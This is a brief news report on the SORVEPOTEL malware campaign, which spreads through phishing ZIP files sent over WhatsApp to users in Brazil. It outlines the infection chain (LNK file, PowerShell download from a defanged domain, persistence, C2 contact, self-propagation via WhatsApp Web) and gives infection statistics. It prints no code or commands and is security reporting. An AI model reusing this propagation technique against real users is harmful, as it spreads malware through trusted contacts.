A newly discovered malware campaign is targeting WhatsApp users in Brazil, spreading rapidly through phishing techniques. The malware, named SORVEPOTEL by Trend Micro researchers, is designed for fast propagation rather than data theft or ransomware.
The attack begins when compromised WhatsApp accounts send phishing messages containing malicious ZIP file attachments. These files often appear as receipts or health-related documents, giving them an air of legitimacy. Victims are tricked into opening the attachment on desktop systems, where the malware executes a Windows shortcut (LNK) file. This file silently runs a PowerShell script to download the main payload from an external domain such as sorvetenopoate[.]com.
Once downloaded, the payload installs itself in the Windows Startup folder to ensure persistence and connects to a command-and-control (C2) server for further instructions.
What makes SORVEPOTEL particularly dangerous is its WhatsApp Web propagation mechanism. If it detects that WhatsApp Web is active, the malware automatically sends the malicious ZIP file to all of the victim’s contacts and groups. This leads to rapid spread across enterprise and consumer environments. Infected accounts are often banned for generating excessive spam.
So far, researchers have identified 477 infections, with 457 cases concentrated in Brazil. The malware has heavily affected sectors including government, education, technology, manufacturing, construction, and public services.
Although there is no evidence that SORVEPOTEL steals sensitive data or encrypts files, its ability to spread quickly highlights the growing trend of cybercriminals exploiting trusted platforms like WhatsApp for large-scale attacks.
